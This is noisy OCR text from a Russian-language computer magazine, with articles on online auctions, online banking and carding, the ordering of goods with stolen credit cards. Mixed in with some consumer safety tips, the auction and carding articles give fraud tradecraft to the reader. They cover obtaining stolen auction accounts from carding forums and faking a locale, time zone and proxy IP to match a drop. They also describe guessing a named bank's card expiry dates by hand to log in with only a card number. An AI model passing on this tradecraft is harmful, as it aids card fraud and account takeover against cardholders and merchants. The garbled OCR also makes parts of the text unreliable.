он разные товары (автомагнитолы, музыкальные центры и т.п.) со 
стартовой ценой в 1 доллар. Однажды ради смеха выставили на 


аукцион купюру в 100 долла- 
ров со стартовой ценой в $1. 
После долгих и продолжи- 
тельных торгов купюра ушла 
за 100 долларов и 50 центов. 
Организаторы думали, что 
люди пошутили и за ней не 
приедут. Каково было их 
удивление, когда приехал 
счастливый победитель и 
забрал $100. Как потом выяс- 
нилось, на разнице курсов 
валют он заработал 50 руб- 
лей. Пустячок, а приятно! :) 


Счастливый обладатель 100 долларов 


остается за тобой - сам я их услугами 
не пользовался. 


КАК ЗАРАБОТАТЬ 

НА ИНТЕРНЕТ-АУКЦИОНЕ 

Именно безумно низкими ценами на 
безумно дорогие товары и привлека- 
ют аукционы новых клиентов. Так 
это или нет, оставлю решать тебе, 
лишь приведу несколько срактов. На 
зарубежных аукционах можно найти 
бэушный (а иногда и новый) товар, 
гораздо дешевле, чем на рынке и в 
специализированных магазинах у 
нас в стране. Это факт. Между про- 
чим, некоторые хитрые люди зараба- 
тывают свой первый миллион именно 
на такой разнице цен. Если ты решил 
попробовать себя на ниве посредни- 
чества, желаю успехов, но хочу пре- 
достеречь - не все так просто, как ка- 
жется на первый взгляд - еще есть 
доставка, за которую нужно платить, 
таможня, где тоже любят зеленень- 
кие бумажки, есть и другие охотники 
за наживой. 


Есть и другой способ, особенно люби- 
мый русскими дельцами - продавать 
буржуинам "зомейский матрешки", 
изготовленные за бутылку столяром 
дядей Васей, или "настоящие шапки- 
ушанки КГБ'шника", которые можно 
купить на развалах и затем прикру- 
тить огромную красную звезду. Аме- 
риканцам нравится советская симво- 
лика, и они готовы за это платить. 


Некоторые господа зарабатывают 
деньги чуть иначе - продавая вещи, 
которые обычно достаются на халяву. 
Например - пригласительные билеты 
на мероприятия, бесплатные футбол- 
ки, кепки и т.п. Народ покупает. 


Как ты уже понял - на аукционе мож- 
но попробовать продать практически 
все. Если цена не заоблачная, то, ско- 
рее всего, купят. Вероятность покупки 
зависит от популярности ресурса и ге- 
оградфии посетителей. 


a iy 
Майка интернет-аукциона Molotok.ru 


Ш Ha интернет-аукционе e-buy обитает группа предпринимателей 
nog названием "Safe Harbour". Они занимаются тем, что отыскива- 
ют на аукционах выгодные предложения, дешевые или пользую- 
щиеся особым спросом товары, проверяют их на валидность, тут 
же покупают и выставляют на аукцион или перепродают с нацен- 


кой. Так как такие посреднические сделки - их хлеб, то на все по- 
дозрительные, по их мнению, лоты они ставят "Red Flag" - красный 
флаг, метку, указывающую на сомнительность товара. Это отпуги- 
вает потенциальных покупателей и привлекает модератора для бо- 
лее детальной проверки лота и выяснения дополнительной инфор- 
мации у продавца, вплоть gO снятия лота с аукциона. 


КАК ОБМАНЫВАЮТ НА ИНТЕР- 
НЕТ-АУКЦИОНАХ 

m Как и в любом месте, где имеют де- 
ло с деньгами, на интернет-аукционах 
не исключены махинации и мошенни- 
чество. Взлом и хакинг я рассматри- 
вать не буду, к этому нужен особый 
подход, да и тема номера у нас другая. 


Для затравочки расскажу о самом 
простом способе получения почти ха- 
лявных денег. Периодически модера- 
торы аукционов радостно рапортуют 
о поимке очередных мошенников. Как 
правило, ловят накрутчиков, которые 
выставляют лот на аукцион, а затем 
под разными именами повышают це- 
ну на товар. Это позволяет взвинтить 
цену и увлечь азартного покупателя. 
Есть и более серьезные способы по- 
лучения денег из воздуха. Сама схе- 
ма, в отличие от реализации, доволь- 
но проста. Редиска (нехороший чело- 
век) заводит аккаунт на сайте интер- 
нет-аукциона, затем выставляет на 


аукцион несуществующий товар, по- 
Лучает за него деньги и исчезает. Но 
не стоит сразу же бежать к компу и 
выкладывать на аукцион предложе- 
ние, типа "платиновые часы с брилли- 
антами всего за 100000". Если бы все 
было так просто, то опйпе-аукционы 
не дожили бы до наших дней. Секрет 
прост - на серьезных аукционах адми- 
ны не спят и принимают меры по пре- 
дупреждению кидалова. В частности, 
твой аккаунт при некоторых действи- 
ях могут закрыть. Это может произой- 
ти, когда возникают сомнения в зако- 
нопослушности и добропорядочности 
пользователя. Разумеется, некоторые 


люди тоже умеют думать и обходить 
эти ограничения. 


Во-первых, кардер, который серьезно 
настроился на получение сотни-дру- 
гой золотых от наивного Буратино, 
всегда найдет себе аккаунт на аукцио- 
не. Естественно, под собственным име- 
нем регистрироваться он не будет. 
Кроме того, левые данные Ha популяр- 
ных аукционах тоже не прокатят - их 
часто проверяют. Остается лишь д0- 
бывать реальные аккаунты, которыми 
перестали пользоваться. О способах 
их добычи ты прочитаешь в статье 
под названием "Как обчищают бога- 
чей", а я могу лишь молчать и хитро 
улыбаться :). Кроме того, аккаунты на 
популярные оп!те-аукционы мира ты 
всегда найдешь на кардерских cpopy- 
мах и чатах - вытрейдить их не состав- 
ляет особого труда. Но вот все, что ты 
будешь делать с ними дальше, пусть 
останется на твоей совести. 


Среди продаваемых аккаунтов особой 
популярностью пользуются акки, с ко- 
торых владелец в прошлом продавал 
какие-либо вещи, лучше дорогие. Есте- 
ственно, что к этому акку у модератора 
появляется доверие, и, соответствен- 
но, внимание притупляется. Вопросы 
могут возникнуть в том случае, если 
"владелец акка" в течение полугода 
продавал детские горшки, а тут варуг 
ни с того ни с сего предлагает оргтех- 
нику от производителя. Согласись, нес- 
колько странновато. В этом случае 
будь готов дать администрации логич- 
ный и исчерпывающий ответ. 


Посетители кардерских форумов со- 
ветуют без особой необходимости не 
менять данные владельца аккаунта. 
Администрация аукционов весьма по- 
дозрительно относится к таким 
действиям. В особенности это касает- 
ся адреса электронной почты и тем 
более реального адреса. 


Также весьма важным фактором яв- 
ляется страна проживания владельца 
аккаунта. Наиболее привлекательным 
местом проживания является США 
или одна из развитых западных стран. 
Пользователи считают, что свои не 
обманут, ну или, в крайнем случае, по- 
лиция достанет. К другим странам, 
особенно к России и Украине, как-то 


нет доверия :). Поимевшему доброт- 
ный бюргерский аккаунт придется 
принять ряд мер gna усыпления бди- 
тельности модераторов. 


Во-первых, необходимо знать английс- 
кий язык. Сам посуди - американец в 
четвертом поколении и вдруг начинает 
лопотать, что "не понимайт", что ему 
тут понаписали. Уж если тебе ну совсем 
не выучить язык, хотя бы на бытовом 
уровне, всегда есть сосед (а лучше со- 
cegka), который поможет тебе соста- 
вить письмо "американскому другу". 
Насчет программ-переводчиков совето- 
вать ничего не буду, попробуй перевес- 
ти более-менее сложную сфразэу на анг- 
лийский, а потом наоборот, и посмотри, 
что останется от изначальной фразы. 
Обрати внимание и на региональные 
настройки винды. Службы аукциона 


Не все кардеру халява... 


собирают всю максимально возмож- 
ную информацию о своих пользова- 
телях. При несоответствии заявленно- 
го места проживания с региональны- 
ми настройками операционной систе- 
мы пользователь автоматически по- 
падает под пристальное внимание. 


Весьма важным фактором является [Р- 
адрес, под которым ты гуляешь по Се- 
ти. Для создания маски добропорядоч- 
ности и политкорректности стоит захо- 
дить на аукцион через прокси-серверы 
того региона, под который ты маскиру- 
ешься. Как выглядит добропорядочный 
англичанин с российским IP? Правиль- 
но, подозрительно. Обрати внимание и 
на сокрытие своего реального IP от 
прокси-серверов. Многие прокси ведут 
логи пользователей. По запросу служб 
безопасности эти базы выдаются, и 
пользователя можно легко отследить. 
Чтобы не возникло такой ситуации, не- 
обходимо воспользоваться анонимиза- 
тором, который стопроцентно потеряет 
твой реальный ГР. Их списки можешь 
найти в недрах хакерских сайтов. 


АУКЦИОН ФОРЕВА! 

m Несмотря на некоторые недостатки, 
интернет-аукционы остаются весьма 
популярными торговыми площадками. 
Количество их пользователей и объем 
продаж постоянно растут. По некото- 
рым предположениям, в ряде областей 
они смогут вытеснить и электронные 
магазины. Что ж, посмотрим. 


Службы 
аукциона 
собирают 
всю макси- 


мально воз- 
можную ин- 
формацию о 
своих поль- 
зователях. 


Обратный 
аукцион яв- 
ляется пол- 
ной проти- 
вополож- 
ностью анг- 
лийскому. 
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m Онлайн-банкинг, он 


же электронный (е- 


Если клиент 


сочтет, что 
оборудова- 
ние, кото- 
рое он при- 
обрел для 
доступа к 
интернет- 
банкингу, 
его не уст- 
раивает, то, 
согласно за- 
кону о за- 
щите прав 
потребите- 
лей, он име- 
ет право 
вернуть 
свои деньги, 
в случае ес- 
ли он поль- 
зовался ин- 
тернет-бан- 
кингом не 
более 30 
дней. 


В России 
дела обсто- 
ят немного 
по-другому: 
так как 


число поль- 
зователей 
интернета 
составляет 
всего 17 
процентов 
от общего 
населения 
страны, то 
такой услу- 
гой, как он- 
лайн-бан- 
кинг, поль- 
зуется 
лишь один 
из двухсот 
сорока семи 
юзеров. 


banking) и домашний 
(home banking), это удаленное управ- 
ление банковскими счетами посред- 
ством телефона (телебанкинг), персо- 
нального компьютера и интернета 
(интернет-банкинг) или портативных 
устройств (мобильный банкинг). Теле- 
банкинг и мобильный банкинг мы по- 
ка отложим в сторону. А я расскажу 
тебе о типах on-line банков. 
Существуют так называемые вирту- 
альные банки - работающие с клиен- 
тами исключительно через интернет, 
и, в отличие от традиционных банков, 
не располагающие филиальной 
сетью. И есть традиционные банки, 
которые используют возможности ин- 
тернета для удаленного банковского 
обслуживания своих клиентов. То 
есть помимо обычных своих сервисов, 
банк использует в качестве дополни- 
тельной услуги интернет-управление 
аккаунтами вкладчиков. Такой банк 
называется интернет-банком. 


Ты спросишь, в чем же преимущест- 
во интернет-банков? В том, что где 
бы ты ни находился и что бы ни де- 
лал, имея под рукой компьютер с 
доступом в интернет, ты легко мо- 
жешь управлять своими капиталами. 
Около 35 процентов европейцев, 
пользующихся интернетом, так и де- 
лают. В России дела обстоят немного 
по-другому: так как число пользова- 
телей интернета составляет всего 17 
процентов от общего населения 
страны, то такой услугой, как онлайн- 
банкинг, пользуется лишь один из 
двухсот сорока семи юзеров. При 
этом он является юридическим пи- 
цом и разбирается в программном 
обеспечении на уровне "выше Cpeg- 
него". В России уже есть 10 крупных 
банков, предоставляющих своим 
клиентам такую услугу. Согласно ин- 
сфрормации, полученной с сайта Ин- 
тер Финанс, в скором будущем отк- 
роются еще два, а значит - спрос на 
эти услуги все-таки есть. 
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рис. Константин Комардин 


И еще немного об удобствах и воз- 
можностях On-line banking'a. Список 
стандартных операций с аккаунтом 
через интернет, предлагаемых банка- 
ми пользователям, почти везде оди- 
наков. Это, естественно, просмотр те- 
кущего баланса и состояния счета, пе- 
ревод и пополнение денежных 
средств. Пополнить счет можно как 
наличными, так и через банкомат, вос- 
пользовавшись пластиковой картой. 
Можно и закрыть счет. Вот только за- 
чем? :) Существуют и бонусные воз- 
можности - например, заполнив спе- 
циальный договор, можно получить в 
банке кредит. И это еще далеко не 
все. 

Очевидно, что при пользовании оп- 
line banking'om тебе не придется бе- 
гать в банк и стоять в очереди, чтобы 
получить деньги или пополнить счет. 
Все гениальное просто. Так что, не от- 
рывая пятой точки от кресла, можно 
произвести практически все те же 
операции, что и при посещении банка. 
Поэтому всякие умные люди, вроде 
Бори Березовского, используют сис- 
тему интернет-банкинга. Прикинь, как 


пришлось бы заморачиваться бедня- 
ге, посещая несколько банков в раз- 
ных частях мира, при том, что в неко- 
торые страны его не пускают, а в не- 
которых еще и арестовать могут ;). 
Кстати, некоторые банки предоставля- 
ют эту услугу абсолютно бесплатно, 
достаточно написать заявление. 
Теперь еще о бонусах. У каждого бан- 
ка есть как свои заморочки, так и свои 
достоинства. Так как я не смог объез- 
дить и обзвонить все банки, предос- 
тавляющие услуги онлайн-доступа (я 
рассматриваю только русские онлайн- 
банки), я позволил себе воспользо- 
ваться информацией из интернета. 


Оказалось, что в некоторых банках 
имеет место реферальная система 
(как, например, в старой доброй спе- 
дии). Если ты привел, допустим, в Гута- 
Банк одного реферала, то получаешь 
2 месяца бесплатного обслуживания. 
А если ты еще и старый клиент, то твой 
друг тоже получит 3 месяца ‹фо фри. 
Также Гута-Банк позволяет тебе БЕСП- 
ЛАТНО открыть карточку Visa Electron. 


В некоторых банках возможно устано- 
вить лимит денежного перевода. За- 
меть, что переводы через интернет- 
банкинг считаются безналичными, и, 
соответственно, налогом с продаж не 
облагаются, что является реальным 
шансом сэкономить свои кровные. 


Уверен, тебе уже захотелось открыть 
свой аккаунт в каком-нибудь онлайн- 


НЕМНОГО О КАРДИНГЕ 
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Отсюда вы- 
вод - рус- 
ские банки 
самые бан- 
ковые банки 
в мире! У 
американ- 
цев нет та- 
ких бону- 
сов. И при 
этом, у них 
в большин- 
стве случа- 
ев просто 
ужасная 
система ав- 
торизации. 


Более 40 
процентов 
кредитных 
карт добы- 
ваются кар- 
дерами ме- 
тодом заме- 
ны страни- 
цы какого- 
либо сайта 
на свою, 
которая пи- 
шет номера 
и прочую 
информа- 
цию, вве- 
денную об- 
ладателем 
карты, в 
лог. 
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банке :). Читай дальше, потому что 
именно об этом я и собираюсь расска- 
зать. Особое внимание мы уделим бе- 
зопасности, поскольку работать тебе 
придется с реальными деньгами. 

К сожалению, полностью обезопасить- 
ся невозможно. Все, что сделано од- 
ним человеком, другой чеповек в си- 
лах сломать. Правда, в российских бан- 
ках защита почти всегда на высшем 
уровне. И пользователю практически 
не придется заботиться о безопаснос- 
ти своей системы. В некоторых банках 
существуют как программные, так и ап- 
паратные уровни защиты. Из аппарат- 
ных существуют У$В-ключи и адаптер- 
ные ключи, по внешнему виду и уст- 
ройству похожие на обычные ключи от 
домофонов. Но это не всегда хорошо. 
Как поступить, если на компьютере нет 
USB-nopta? А если ты уезжаешь в от- 
пуск, придется брать адаптер и ключ с 
собой. Ведь интернет-банкинг и создан 
для того, чтобы им управлять удален- 
но. Ключ можно потерять, а за новый 
придется платить даже больше, чем за 
первый, так как надо будет еще опла- 
тить деактивацию старого ключа. Клю- 
чи, правда, стоят относительно недоро- 
го - в пределах 800 рублей. Если ты 
спросишь, какой из них выбрать, я бы 
посоветовал именно У$В-ключ. OH бо- 
лее надежен. Такой ключ шифрует 
данные, передаваемые тобой во время 
работы с банком. 

Кстати, если клиент (то есть ты) соч- 
тет, что оборудование, которое он 
приобрел gna доступа к интернет-бан- 
кингу, его не устраивает, то, согласно 
закону о защите прав потребителей, 
он имеет право вернуть свои деньги, 
в случае если он пользовался интер- 
нет-банкингом не более 30 дней. А в 
"Anbcpa Банк Экспресс" программное 
обеспечение вообще выдается поль- 
зователям бесплатно (судя по всему, 
оно просто входит в стоимость подк- 
лючения к услуге). Отсюда вывод - 
русские банки самые банковые банки 
в мире! У американцев нет таких бону- 
сов. И при этом, у них в большинстве 


Ш www.internetfinance.ru - сайт о финансах, я узнал из него 


много нового и полезного 


Ш www.citybank.com - ситибанк (буржуйский) 
Ш www.tpsbank.tomsk.ru - Томский банк ТПСБанк 


Пожалуй, это один из тех немногих случаев, 
когда в России какая-то услуга организована 
реально лучше зарубежной 


случаев просто ужасная система ав- 
торизации. Не веришь? Я готов дока- 
зать. Для примера возьмем банк Ка- 
лисфорнии и CityBank. В СитиБанке от 
тебя требуется пин-код карты. В про- 
даже можно легко найти или вытрей- 
дить у кого-либо карты с пин-кодом. В 
банке Калифорнии необходим всего 
лишь номер карты и пароль. А в слу- 
чае утери пин-кода или ключа, тебе 
скажут что-нибудь вроде: "Спасение 
утопающих - дело рук самих утопаю- 
щих" (сам потерял, сам и разбирайся). 
А за то, чтобы они взяли на себя обя- 
зательство найти кардера, тебе при- 
дется отвалить им определенный про- 
цент от вклада или просто заплатить 
кучу денег. Вот такие "американские 
банки". Пожалуй, это один из тех нем- 


ногих случаев, когда в России какая- 
то услуга организована реально луч- 
ше зарубежной. Именно РЕАЛЬНО, а 
не в соответствии с пословицей "что 
для русского халява - для американца 
2 года тюремного заключения" :). 


Так как же все-таки обезопасить свой 
вклад? Во-первых, никогда и нигде не 
называй свой пароль доступа, пин- 
код. Обращай внимание на протокол 
передачи данных. Если это http, то 
стоит задуматься, надо пи? Когда отк- 
роется страница-сформа для ввода 
данных кредитной карты, посмотри на 
строку адреса, вернее - на ее начало. 
Если там ты видишь "https", то можно 
эту форму заполнить. Если нет, то 
уходи с этого сайта. Это относится и к 
интернет-магазинам. Более 40 про- 
центов кредитных карт добываются 
кардерами методом замены страницы 
какого-либо сайта на свою, которая 
пишет номера и прочую информацию, 
введенную обладателем карты, в лог. 
Остальные методы защиты стандарт- 
ны. Пользоваться антивирусной прог- 
раммой, сраервопом, не открывать 
вложения из непонятных писем, не 
сообщать друзьям, а тем более незна- 
комым людям, информацию о своей 
кредитной карте/банковском аккаунте. 


ОБЗОР ОНЛАЙН-БАНКА 

и Самое время рассмотреть реаль- 
ный пример онлайн-банка. Это будет 
ТПСБанк (г. Томск). 


Вот как истолковывают менеджеры 
банка понятие "интернет-банк": 
"Интернет-банк - это новая компью- 
терная система проведения электрон- 
ных платежей через глобальную сеть 
Internet, которая позволит вам с мак- 
симальной скоростью и надежностью 
осуществлять платежи в рублях и 
иностранной валюте из любой точки 
земного шара через наш банк, а также 
получать выписки по своим счетам и 
обмениваться сообщениями с сотруд- 
никами банка, экономя при этом массу 
времени. Все, что вам необходимо 
иметь при себе - это дискета с секрет- 
ным ключом и доступ к интернету. Та- 
кая система должна стать основной 
формой общения клиента с банком в 


Для авторизации надо знать ТОЛЬКО 
номер кредитки и expiration date (дата 
окончания действия кредитной карты) 


области расчетного обслуживания". 
Так-так, значит, в этом банке исполь- 
зуется система защиты с помощью 
ключа на дискетке. Ну что ж, хороший 
вариант. При регистрации (осрлайно- 
вой, в реальном банке) пользователя 
подводят к компьютеру, он жмет на 
кнопку в генераторе, создавая таким 
образом ключ. Ключ записывается в 
базу данных напротив логина и паро- 
ля. Го есть, пользователь сначала ло- 
гинится, а потом уже использует ключ. 
Логин и пароль этим ключом не шифр 
руются. Ключ лежит в базе, и вся ин- 
формация, поступающая от пользова- 
теля, сначала поступает на сервер за- 
шифрованной, там берется ключ, со- 
ответствующий этому пользователю, 
и информация декодируется. 

Вот что можно делать, используя ус- 
лугу "Онлайн-банк" компании 
"ТПСБанк": 

Ф. Отправлять в банк все виды фи- 
нансовых документов, включая пла- 
тежные поручения, и осуществлять 
валютные переводы. 

@. Получать из банка выписки по 
своим счетам за любой период с мо- 
мента начала работы счета. 

@. Осуществлять контроль Hag теку- 
щим состоянием документов в банке. 
@. Обмениваться сообщениями с сот- 
рудниками банка. 

Для регистрации нам необходимо: 

@. Открыть счет в ОАО "Томскпром- 
стройбанк" (если нет счета). 

©. Провести предварительную реги- 
страцию с помощью системы "интер- 
нет-банк", сгенерировать и зарегист- 
рировать ключи ЭЦП клиента. 


Логинимся в ТПСБанк 


Вход в СитиБанк 


@. Получить сертификат открытого 
ключа клиента, распечатать и заве- 
рить его круглой печатью и подпися- 
ми ответственных лиц, образцы кото- 
рых содержатся в банковской карточ- 
ке образцов подписей. 

@. Загрузить бланк договора Ha обс- 
луживание в системе "интернет-банк" 
и заполнить его. 

@. Заключить договор на обслужива- 
ние в системе "интернет-банк" и про- 
извести окончательную регистрацию 
в банке (при наличии распечатанного 
сертификата). 

Примечание: информация о банке взя- 
та сего сайта и автором не изменялась. 


Хочу представить твоему вниманию 
еще один банк, под названием "О.В.К. 
Банк". Он просто поразил меня своим 
сфреноменальным легкомыслием. Для 
авторизации надо знать ТОЛЬКО но- 
мер кредитки и expiration date (дата 
окончания действия кредитной карты). 
На худой конец - только номер. Проб- 
руторорсить дату окончания не соста- 
вит труда. Ведь в этом году макси- 
мальный срок действия карты - приб- 
лизительно до 2010 года. Таким обра- 
зом, имея 12 месяцев в каждом году, 
мы получаем 120 комбинаций. Такое 
можно подобрать и руками, без помо- 
щи специального cocpTa. 


В ПРОДАЖЕ С 9 ОКТЯБРЯ 


World of Warcraft 


Сможет ли World of Warcraft 
совершить долгожданный прорыв 
в жанре онлайновых RPG? 


МЫСЛИ ВСЛУХ 


Кто одержит победу в битве шутеров, 
посвященных Второй мировой войне? 
Читайте наш специальный репортаж 
про двух главных соперников: Са! of 
Duty и Medal of Honor: Pacific Assault. 


ДЕМИУРГИ Il 


Эту игру мы ждали с нетерпением со 
дня первого анонса и вплоть до 
выхода. И вот она на нашем разде- 
лочном столе: красивая и свежая! 
Читайте эксклюзивный обзор! 


ТЕСН 


Тест: семь мониторов для игроманов. 
Сделай сам: собираем домашний 
кинотеатр. Первый взгляд: системная 
плата Gigabyte GA-7VT600 1394. 
Джойстик Saitek Cyborg Evo. 3D- 
akcenepatop ASUS V9950 Ultra. 
«Крякнутый Кейс». Новости. 


А также: новости, preview, review, 
loading, советы по прохождению игр, 
как это делается..., игровая альтер- 
натива, двадцатка лучших игр, гра- 
фик выхода игр и многое другое 
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ВЕЩЕВОЙ КАРДИНГ 
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ещевой кардинг получил наибольшее распространение среди кардеров. 
Его суть заключается в заказе товаров в интернет-магазинах по 
чужим кредитным картам с целью последующего сбыта. 
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хема работы вещевика, вроде = я 
бы, лежит на поверхности. Это г — -- 
привлекает многих начинаю- - — 
щих кардеров, которым все = 
кажется понятным и простым. a ta 

На самом деле заниматься вещевым кардин- a = 5% im. 

TOM не Tak легко. Чтобы получать доход, нуж- = = 

на цепочка людей, которые будут слаженно —— _ —— — 


работать. 


КАК ЗАКАЛЯЛАСЬ СТАЛЬ 

В середине 1990-х годов никто еще не 
слышал о махинациях с кредитными картами, 
а редкие случаи пропажи денег были ошиб- 
ками магазинов и банков. Поэтому непуга- 
ные интернет-магазины охотно принимали 
несуществующие сгенерированные кребит- 
ные карты, алгоритм которых был таким же, 
как и у настоящих карт. Проверив алгоритм, 
интернет-магазины высылали заказанный 
товар. Обман вскрывался только в конце ме- 
сяца, когда магазины запрашивали у банков 
перевод денег с карт на оплату товара. Есте- 
ственно, что денег магазин не получал, так 
как запрошенных кредитных карточек прос- 
то не существовало в природе. 


В это время в странах СНГ стало возможным 
получить доступ к интернету. Первыми поль- 
зователями были в основном преподаватели 
и студенты вузов. Эти студенты и составляли 
основу зарождающегося кардерства СНГ. 
Голодные студенты кардили все, что только 
можно, делая упор на электронику и ювелир- 
ные изделия. Особым рвением отличались 
украинские кардеры, которые организовали 
в Киеве целую сеть по транспортировке, хра- 
нению и сбыту накарженного. Десятки квар- 
тир покупались под склады аля хранения 
электроники, которую не успевали сбывать 
по бросовым ценам. На таможенном термина- 
ле в киевском международном аэропорту Бо- 
рисполь круглосуточно дежурили несколько 
грузовиков, вывозивших груз после каждого 
международного рейса. Таможенники, быст- 
ро оформлявшие прибывшие грузы, тоже в 
накладе не оставались :). Товар из европейс- 
ких магазинов в основном доставлялся на- 
земным путем. Объем товара был настолько 
велик, что нередко магазины отправляли 
свои фуры прямо на Украину, не прибегая к 
услугам почты. Многие магазины всерьез за- 
думались об открытии своих филиалов в 
СНГ. 
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Товар сбывался по подложным документам 
через оптовые и розничные магазины, кото- 
рые были заинтересованы в покупке фир- 
менной электроники по низким ценам. Огром- 
ный поток скарженной электроники привел к 
затовариванию украинского рынка. Сложи- 
лась парадоксальная ситуация, когда можно 
было купить оперативную память по цене в 
два раза дешевле отпускной цены произво- 
дителя. Легальные поставки электроники, 
особенно компьютеров, практически прекра- 
ТИЛИСЬ. 


Сказка не могла длиться вечно. ФСБ совме- 
стно с Интерполом уже некоторое время сле- 
дили за вызывающей деятельностью карде- 
ров. В 1996 году по Украине, России и Бело- 
руссии прокатилась волна арестов. Главари 


EMA ВЕЩЕВОГО КАРДИНГА 
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очень трудно. В то время мой знако- 
мый заказал в европейском интернет- 
магазине по своей кредитке какую-то 
редкую книгу. После заказа ему поз- 
вонили из магазина и попросили наз- 
вать все реквизиты его кредитной 
карточки. Потом попросили выслать 
отсканированную с двух сторон кре- 
дитку. И когда все требования магази- 
на были выполнены, оттуда после не- 
дели раздумья пришел ответ, что по 
техническим причинам товар не мо- 
жет быть выслан. Такие пироги. 


Многие думали, что это конец недол- 
гой жизни вещевого кардинга, но вы- 
ход был найден. Если они не шлют 
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кардерских группировок и их прибли- ный 
женные были арестованы. О дальней- eTUDENMT 
шем существовании таких сообществ ричи о 
не могло быть и речи, теперь каждый тей LA Са 
был сам за себя. Товар старались сеет Фары 

. р стар аж ыы: 
сбыть сразу после получения, работа- Ба ны am в 


ли в основном поодиночке или не- 
большими группами, не привлекая 
лишних людей. 


ПАЛКИ В КОЛЕСА 

Долго такой беспредел продол- 
жаться не мог. Из-за действий карде- 
ров очень многие интернет-магазины 
разорились. Оставшиеся магазины 
объявили страны СНГ вне закона и 
перестали слать в СНГ товар. Причем 
даже по легальной кредитной карте 
заказать что-то в иностранных мага- 
зинах жителям СНГ было очень и 


КРЕДИТКИ С ОНЛАЙН-ДОСТУПОМ 
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нам, то будут слать в свою страну! Те- 
перь кардеры искали иностранца, ко- 
торый бы принимал товар и за вознаг- 
раждение пересылал его в СНГ либо 
продавал у себя на родине, высылая 
часть денег (а часть себе в карман). С 
тех пор кардеры специализируются 
по регионам: США, Великобритания 
или Европа. При этом, например, евро- 
пейские магазины без проблем шлют 
товар в пределах Европы, в том числе 
и в такие близкие нам страны, как 
Латвия, Болгария и даже Украина. 


Следующим ударом по кардерскому 
ремеслу стал постепенный отказ в 
приеме сгенерированных кред. В свя- 
зи с большими убытками магазинов, у 
банков появились новые сервисы, 
позволяющие магазину проверять 
достоверность данных о кредитной 
карте на лету или в разумные сроки 
(раньше магазин узнавал, что его на- 
дули, уже после того, как покупка отп- 
равлялась заказчику). И теперь мага- 
зин мог отсеять несуществующую 
кредитку еще до отсылки товара. Но и 
эту преграду удалось преодолеть. Из- 
за несовершенства защиты интернет- 
магазинов можно было утянуть у них 
базу данных с информацией о кредит- 
ных картах клиентов, делавших у них 
покупки. 


С этого момента многие добропоря- 
дочные американцы боялись делать 
покупки в интернет-магазинах. И пра- 
вильно делали. Каждый магазин уве- 
ряет покупателей, что у него самая 
надежная защита. Но было бы намно- 
го лучше, если бы магазины просто не 
хранили информацию о покупателях 
у себя на сервере. Иногда можно, вве- 
дя в поисковике что-нибудь типа 
"credit card name adress", выйти Ha 
список кредитных карт, который хра- 
нится на сервере интернет-магазина. 
То есть информация о кредитных кар- 
тах в этом случае настолько незащи- 
щена, что даже индексируется поис- 
ковыми системами! Теперь, когда в 
магазине делали заказ по существую- 
щей карте, он снимал с нее деньги 
(или просто проверял ее существова- 
ние, а деньги снимал в конце месяца). 
Через некоторое время настоящий 
владелец карты обращался в банк и 
опротестовывал транзакцию. Банк, в 
свою очередь, разбирался с магази- 


Схема рабо- 
ты вещеви- 
ка, вроде 
бы, лежит 
на поверх- 
ности. Это 
привлекает 
многих на- 
чинающих 
кардеров, 
которым 
все кажется 
понятным и 
простым. 
На самом 
деле зани- 
маться ве- 
щевым кар- 
дингом не 
так легко. 


Особым 
рвением от- 
личались 
украинские 
кардеры, 
которые ор- 
ганизовали 
в Киеве це- 
лую сеть по 
транспорти- 
ровке, хра- 
нению и 
сбыту на- 
карженного. 
Десятки 
квартир по- 
купались 
под склады 
для хране- 
ния элект- 
роники, ко- 
торую не 
успевали 
сбывать по 
бросовым 
ценам. 


Сейчас cy- 
ществует He- 
кое равнове- 
сие: с одной 
стороны, по- 
тери интер- 
нет-магази- 
HOB на Kapge- 
рских зака- 
зах покрыва- 
ются при- 
былью с ле- 
гальных по- 
купок, с дру- 
гой стороны, 
этих заказов 
хватает кар- 
дерам, чтобы 
свести концы 
с концами и 
не умереть с 
голоду. 


(29) ПРАКТИКА 


ГРУЗИМ АПЕЛЬСИНЫ БОЧКАМИ } 


ном. Но поезда ушел, товар выслан, а 
магазин опять в дураках. 


Новым шагом в защите от фрауда 
стал запрос магазинами кода с\\2 при 
покупке. Тут уж думали, что кардингу 
пришел конец. Фишка здесь в том, 
что этот код - 3 последние цифры но- 
мера на задней стороне карты, знать 
его может только владелец карты, ко- 
торый держит ее в руках. Теперь лю- 
бые махинации с кредитными картами 
стали в принципе невозможны, так 
как код CVV2 узнать нельзя никак. Из- 
начально планировалось, что Cvv2 не 
будет сохраняться ни на какой стадии 
обработки кредитной карты. То есть 
OH сообщался только банковской сис- 
теме обработки карт, а уже из банка 
шло подтверждение или отказ. Но хо- 
тели как лучше, а получилось как 
всегда. Интернет-магазины, нарушая 
все требования банков, стали сохра- 
нять код CVV2 со всей остальной ин- 
формацией о кредитных картах в сво- 
их базах данных. Ну, а базы, в свою 
очередь, так же спокойно, как и рань- 
ше, воровались, а кардеры получали 
доступ к cvv2. Все вернулось на круги 
своя. И пенять интернет-магазинам 
оставалось только на себя. 


ВЕЩЕВОЙ КАРДИНГ СЕГОДНЯ 
Сейчас вещевой кардинг пережи- 
вает не лучшие времена, но и сдавать 
позиции не собирается. Наблюдается 
некое равновесие среди покупок в ин- 
тернет-магазинах: с одной стороны, 
потери интернет-магазинов на карде- 
рских заказах покрываются при- 
былью с легальных покупок, с другой 
стороны, этих заказов хватает карде- 
рам, чтобы свести концы с концами и 
не умереть с голоду. Сегодня веще- 


РКОХУ-СЕРВЕРЫ 


вой кардинг продолжает оставаться 
популярным среди новичков, хотя не- 
которые и разочаровываются в нем, 
забывая про кардинг навсегда. 


АНОНИМНОСТЬ 
И БЕЗОПАСНОСТЬ 

Главное, на что стоит обратить 
внимание, это безопасность и аноним- 
ность при занятии вещевым кардин- 
гом. При заказе товара в интернет-ма- 
газине специальные скрипты могут 
узнать дополнительную информацию 
о пользователе. Так, например, если 
ты работаешь с американскими интер- 
нет-магазинами, то и твой компьютер 
должен выглядеть как компьютер ти- 
пичного американца. Это значит, что 
установленная операционная система 
должна быть от начала и до конца 
английской - магазин может насторо- 
жить даже наличие русского языка 
для ввода с клавиатуры. Твой часо- 
вой пояс должен быть не просто аме- 
риканским, а соответствовать локаль- 
ному часовому поясу твоего дропа 
(человека, который получает товар из 
магазина и пересылает тебе). При за- 
казе в интернет-магазине обязатель- 
но использование анонимного ргоху- 
сервера. И крайне желательно, чтобы 
IP этого ргоху-сервера соответствовал 
штату твоего дропа, а еще лучше го- 


роду. 


ПРАКТИЧЕСКИЕ СОВЕТЫ 

